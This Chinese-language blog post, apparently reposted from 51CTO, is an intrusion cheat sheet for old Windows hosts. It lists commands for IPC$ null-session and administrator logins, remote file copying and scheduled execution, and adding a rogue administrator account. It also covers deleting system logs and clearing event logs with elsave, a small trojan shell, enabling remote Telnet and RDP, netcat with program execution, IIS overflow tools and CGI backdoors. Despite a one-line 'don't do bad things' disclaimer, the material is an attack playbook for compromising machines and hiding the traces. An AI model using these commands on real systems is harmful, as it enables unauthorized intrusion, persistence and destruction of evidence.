天天看點

網管和黑客都必須知道的指令!看了不要做壞事!

(與遠端主機建立空管連接配接) net use IP位址ipc$ "" /use:"" 

(以管理者身份登入遠端主機) net use IP位址ipc$ "密碼" /use:"Administrator" 

(傳送檔案到遠端主機WINNT目錄下)copy 本機目錄路徑程式 IP位址admin$ 

(檢視遠端主機時間) net time IP位址 

(定時啟動某個程式) at IP位址 02:18 readme.exe 

(檢視共享) net view IP位址 

(檢視netbios工作組清單) nbtstat -A IP位址 

(将遠端主機C槽映射為自己的F盤) net use f: IP位址c$ ""/user:"Administrator" 

(這兩條把自己增加到管理者組): net user 使用者名 密碼 /add 

net localgroup Administrators 使用者名 /add 

(斷開連接配接) net use IP位址ipc$ /delete 

===================================================== 

擦屁屁: 

del C:winntsystem32logfiles*.* 

del C:winntsystem32config*.evt 

del C:winntsystem32dtclog*.* 

del C:winntsystem32*.log 

del C:winntsystem32*.txt 

del C:winnt*.txt 

del C:winnt*.log 

============================ 

一、netsvc.exe 

下面的指令分别是列出主機上的服務項目、查尋和遠端啟動主機的“時間任務”服務: 

netsvc /list IP位址 

netsvc schedule IP位址 /query 

netsvc IP位址 schedule /start 

二、OpenTelnet.exe 

遠端啟動主機的Telnet服務,并綁定端口到7878,例如: 

OpenTelnet IP位址 使用者名 密碼 1 7878 

然後就可以telnet到主機的7878端口,進入DOS方式下: 

telnet IP位址 7878 

三、winshell.exe 

一個非常小的木馬(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>後,可打下面的指令: 

p Path (檢視winshell主程式的路徑資訊) 

b reBoot (重新啟動機器) 

d shutDown (關閉機器) 

s Shell (執行後你就會看到可愛的“C:>”) 

x eXit (退出本次登入會話,此指令并不終止winshell的運作) 

四、3389登陸器,GUI方式登入遠端主機的 

五、elsave.exe 

事件日志清除工具 

elsave -s IP位址 -l "application" -C 

elsave -s IP位址 -l "system" -C 

elsave -s IP位址 -l "security" -C 

執行後成功清除應用程式日志,系統日志,安全日志 

六、hbulot.exe 

開啟win2kserver和winxp的3389服務 

hbulot [/r] 

使用/r表示安裝完成後自動重起目标使設定生效。 

七、nc.exe(netcat.exe) 

一個很好的工具,一些腳本程式都要用到它,也可做溢出後的連接配接用。 

想要連接配接到某處: nc [-options] hostname port[s] [ports] ... 

綁定端口等待連接配接: nc -l -p port [-options] [hostname] [port] 

參數: 

-e prog 程式重定向,一旦連接配接,就執行 [危險!!] 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, ... 

-h 幫助資訊 

-i secs 延時的間隔 

-l 監聽模式,用于入站連接配接 

-n 指定數字的IP位址,不能用hostname 

-o file 記錄16進制的傳輸 

-p port 本地端口号 

-r 任意指定本地及遠端端口 

-s addr 本地源位址 

-u UDP模式 

-v 詳細輸出——用兩個-v可得到更詳細的内容 

-w secs timeout的時間 

-z 将輸入輸出關掉——用于掃描時 

八、TFTPD32.EXE 

把自己的電腦臨時變為一台FTP伺服器,讓殭屍電腦來下載下傳檔案,tftp指令要在殭屍電腦上執行,通常要利用Unicode漏洞或telnet到殭屍電腦,例如: 

然後可以直接令檔案運作: 

九、prihack.exe是IIS的printer遠端緩沖區溢出工具。idqover.exe是溢出idq的,選擇“溢出後在一個端口監聽”,然後用telnet連接配接它的監聽端口,如果溢出成功,一連它的端口,綁定的指令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以後winxp下需要打winxp。 

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然後用IE浏覽器連接配接。 

一、一 Xscan指令行運作參數說明: 

在檢測過程中,按"[空格]"鍵可以檢視各線程狀态及掃描進度,按"q"鍵儲存目前資料後提前退出程式,按""強行關閉程式。 

1.指令格式: xscan -host [-] [其他選項] 

xscan -file [其他選項] 

其中 含義如下: 

-port : 檢測常用服務的端口狀态(可通過datconfig.ini檔案的"PORT-SCAN-OPTIONSPORT-LIST"項定制待檢測端口清單); 

-ftp : 檢測FTP弱密碼(可通過datconfig.ini檔案設定使用者名/密碼字典檔案); 

-ntpass : 檢測NT-Server弱密碼(可通過datconfig.ini檔案設定使用者名/密碼字典檔案); 

-cgi : 檢測CGI漏洞(可通過datconfig.ini檔案的"CGI-ENCODEencode_type"項設定編碼方案); 

-iis : 檢測IIS漏洞(可通過datconfig.ini檔案的"CGI-ENCODEencode_type"項設定編碼方案); 

[其他選項] 含義如下: 

-v: 顯示詳細掃描進度 

-p: 跳過Ping不通的主機 

-o: 跳過沒有檢測到開放端口的主機 

-t : 指定最大并發線程數量和并發主機數量, 預設數量為100,10 

本文轉自 wwwzbx 51CTO部落格,原文連結:http://blog.51cto.com/wwwzbx/3241,如需轉載請自行聯系原作者

繼續閱讀